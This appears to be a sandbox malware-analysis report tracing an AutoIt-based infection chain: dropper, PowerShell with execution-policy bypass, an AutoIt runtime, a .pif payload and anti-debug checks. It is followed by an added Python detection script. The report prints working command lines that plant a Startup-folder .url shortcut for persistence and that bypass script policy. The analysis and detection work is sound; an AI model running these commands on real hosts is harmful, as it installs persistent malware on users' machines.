Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_009259B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 10_2_009259B3
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008B5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 10_2_008B5EDA
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_005533B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 3_2_005533B7
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3779 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6039 Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe API coverage: 3.4 %
Source: C:\Users\Public\InformationCheck.exe API coverage: 4.7 %
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif API coverage: 4.4 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524 Thread sleep time: -11990383647911201s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7560 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB19BC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00007FF6BB19BC70
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1A72A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_00007FF6BB1A72A8
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1A71F4 FindFirstFileW,FindClose, 0_2_00007FF6BB1A71F4
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB19B7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00007FF6BB19B7C0
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB162F50 FindFirstFileExW, 0_2_00007FF6BB162F50
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1AA4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose, 0_2_00007FF6BB1AA4F8
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1AA350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose, 0_2_00007FF6BB1AA350
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1A6428 FindFirstFileW,FindNextFileW,FindClose, 0_2_00007FF6BB1A6428
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1AA874 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00007FF6BB1AA874
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB19C7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00007FF6BB19C7C0
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00594005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 3_2_00594005
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0059494A GetFileAttributesW,FindFirstFileW,FindClose, 3_2_0059494A
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0059C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 3_2_0059C2FF
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0059CD14 FindFirstFileW,FindClose, 3_2_0059CD14
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0059CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 3_2_0059CD9F
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0059F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 3_2_0059F5D8
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0059F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 3_2_0059F735
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0059FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 3_2_0059FA36
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00593CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 3_2_00593CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_00904005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 10_2_00904005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_0090494A GetFileAttributesW,FindFirstFileW,FindClose, 10_2_0090494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_0090C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 10_2_0090C2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_0090CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 10_2_0090CD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_0090CD14 FindFirstFileW,FindClose, 10_2_0090CD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_0090F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 10_2_0090F5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_0090F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 10_2_0090F735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_0090FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 10_2_0090FA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_00903CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 10_2_00903CE2
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB141D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary, 0_2_00007FF6BB141D80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: powershell.exe, 00000001.00000002.1975598778.000002BB73AE3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000001.00000002.1975598778.000002BB73AE3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: powershell.exe, 00000001.00000002.1975598778.000002BB73AB8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1B0A00 BlockInput, 0_2_00007FF6BB1B0A00
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1237B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00007FF6BB1237B0
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB145BC0 GetLastError,IsDebuggerPresent,OutputDebugStringW, 0_2_00007FF6BB145BC0
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1932F4 LoadLibraryA,GetProcAddress, 0_2_00007FF6BB1932F4
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB18D408 LookupPrivilegeValueW,GetProcessHeap,HeapFree, 0_2_00007FF6BB18D408
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1459C8 SetUnhandledExceptionFilter, 0_2_00007FF6BB1459C8
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1457E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF6BB1457E4
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB15AF58 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF6BB15AF58
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB168FE4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00007FF6BB168FE4
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0055A354 SetUnhandledExceptionFilter, 3_2_0055A354
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0055A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_0055A385
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008CA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_008CA385
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008CA354 SetUnhandledExceptionFilter, 10_2_008CA354

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1"
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB18CE68 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_00007FF6BB18CE68
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1237B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00007FF6BB1237B0
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB199420 SendInput,keybd_event, 0_2_00007FF6BB199420
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB19D158 mouse_event, 0_2_00007FF6BB19D158
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\InformationCheck.exe "C:\Users\Public\InformationCheck.exe" C:\Users\Public\Details.au3 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G" Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit
Source: C:\Users\Public\InformationCheck.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit Jump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB18C858 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_00007FF6BB18C858
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB18D540 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_00007FF6BB18D540
Source: T6l6gPxwQU.exe, 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF800000.00000004.00000020.00020000.00000000.sdmp, T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: T6l6gPxwQU.exe, InformationCheck.exe, SwiftWrite.pif Binary or memory string: Shell_TrayWnd
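The process tree above is the whole chain in four command lines: the dropper runs PowerShell with -ExecutionPolicy Bypass on a script in C:\Users\Public, that script starts InformationCheck.exe (the AutoIt runtime) on Details.au3, a wscript.exe instance later launches SwiftWrite.pif from AppData\Local, and InformationCheck.exe persists by having cmd.exe echo an [InternetShortcut] whose URL= is a local .js file into the Startup folder (the SwiftWrite.url entry in the Boot Survival section). Explorer opens a .url in Startup at logon and hands a local path to its file-type handler, so the .js runs under wscript.exe without any scheduled task or Run key. The following is an added example, not part of the report and not the sample's own code: detection logic for that chain and for the .url persistence, run over constructed process-creation records whose command lines are copied from this report. The ProcEvent record shape, the rule names, the helper names and the benign control event are assumptions for the demo.

```python
"""Added example, not part of the sandbox report: detection logic for the execution
chain and the Startup-folder persistence listed above, run over constructed
process-creation records whose command lines are copied from this report.  The record
shape and the rule names are assumptions for the demo; in practice the same functions
would be fed Sysmon event ID 1 or EDR process telemetry."""

import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class ProcEvent:
    parent: str    # image path of the creating process
    image: str     # image path of the created process
    cmdline: str   # full command line of the created process


# Locations any interactive user can write to; code launched from them deserves a look.
USER_WRITABLE = re.compile(r"c:\\users\\(public|[^\\]+\\appdata)\\", re.I)
STARTUP_DIR = re.compile(r"\\microsoft\\windows\\start menu\\programs\\startup\\", re.I)
SCRIPT_EXT = re.compile(r"\.(js|jse|vbs|vbe|wsf|ps1|bat|cmd|hta)\b", re.I)


def parse_internet_shortcut(text: str) -> Dict[str, str]:
    """Parse the INI-style body of a .url file ([InternetShortcut] section only)."""
    fields: Dict[str, str] = {}
    in_section = False
    for line in text.splitlines():
        line = line.strip()
        if line.lower() == "[internetshortcut]":
            in_section = True
        elif in_section and "=" in line:
            key, value = line.split("=", 1)
            fields[key.strip().lower()] = value.strip().strip('"')
    return fields


def url_shortcut_from_echo(cmdline: str) -> Dict[str, str]:
    """Reconstruct the .url content written by 'echo X > f & echo Y >> f' redirections."""
    # Every 'echo <text> >' or '>>' contributes one line to the target file.
    lines = re.findall(r'echo\s+(.+?)\s*>+\s*"', cmdline, re.I)
    return parse_internet_shortcut("\n".join(lines))


def classify(ev: ProcEvent) -> List[str]:
    """Return the names of the rules the event matches (empty list: nothing suspicious)."""
    hits: List[str] = []
    cl, img = ev.cmdline.lower(), ev.image.lower()
    if ("powershell" in img and "-executionpolicy" in cl and "bypass" in cl
            and USER_WRITABLE.search(cl)):
        hits.append("powershell_bypass_from_user_writable")
    if USER_WRITABLE.search(img) and img.endswith((".pif", ".scr", ".com")):
        hits.append("pe_with_odd_extension_from_user_writable")
    if ev.parent.lower().endswith(("wscript.exe", "cscript.exe")) and USER_WRITABLE.search(img):
        hits.append("script_host_spawns_user_writable_binary")
    if re.search(r"\.au3\b", cl) and USER_WRITABLE.search(img):
        hits.append("autoit_interpreter_from_user_writable")
    if "echo" in cl and STARTUP_DIR.search(cl) and ".url" in cl:
        # The shortcut target decides severity: a local script in a user-writable
        # directory means the script is run by its file-type handler at every logon.
        target = url_shortcut_from_echo(ev.cmdline).get("url", "")
        if SCRIPT_EXT.search(target) and USER_WRITABLE.search(target):
            hits.append("startup_url_shortcut_to_script")
    return hits


# Constructed records: the four command lines from this report plus one benign control.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Users\user\Desktop\T6l6gPxwQU.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1"'),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Users\Public\InformationCheck.exe",
              r'"C:\Users\Public\InformationCheck.exe" C:\Users\Public\Details.au3'),
    ProcEvent(r"C:\Windows\System32\wscript.exe",
              r"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif",
              r'"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" '
              r'"C:\Users\user\AppData\Local\WordGenius Technologies\G"'),
    ProcEvent(r"C:\Users\Public\InformationCheck.exe",
              r"C:\Windows\SysWOW64\cmd.exe",
              r'cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows'
              r'\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata'
              r'\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming'
              r'\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit'),
    # Benign control (made up): an admin script run from a protected directory.
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -File "C:\Program Files\Vendor\maint.ps1"'),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev.image.rsplit("\\", 1)[-1], "->", classify(ev) or "clean")
```

Each rule keys on location plus a flag, not on the tool alone, which is why the control event running PowerShell from Program Files produces no hit while the same binary with -ExecutionPolicy Bypass on a C:\Users\Public script does. The .url rule parses the shortcut the command line is about to write rather than matching on the word "echo", so a benign shortcut to an https:// address in Startup is not flagged; on a live host the same parser can be pointed at the SwiftWrite.url file itself.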

Language, Device and Operating System Detection

Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB15FD20 cpuid 0_2_00007FF6BB15FD20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB19DC1C GetLocalTime, 0_2_00007FF6BB19DC1C
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB182BCF GetUserNameW, 0_2_00007FF6BB182BCF
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB162400 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 0_2_00007FF6BB162400
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB141D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary, 0_2_00007FF6BB141D80
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: SwiftWrite.pif Binary or memory string: WIN_81
Source: SwiftWrite.pif Binary or memory string: WIN_XP
Source: SwiftWrite.pif Binary or memory string: WIN_XPe
Source: SwiftWrite.pif Binary or memory string: WIN_VISTA
Source: T6l6gPxwQU.exe, 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: SwiftWrite.pif Binary or memory string: WIN_7
Source: SwiftWrite.pif Binary or memory string: WIN_8
Source: InformationCheck.exe, 00000003.00000003.1794342033.0000000005BE0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1B3940 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 0_2_00007FF6BB1B3940
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1B4074 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00007FF6BB1B4074
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_005A696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 3_2_005A696E
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_005A6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 3_2_005A6E32
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_0091696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 10_2_0091696E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_00916E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 10_2_00916E32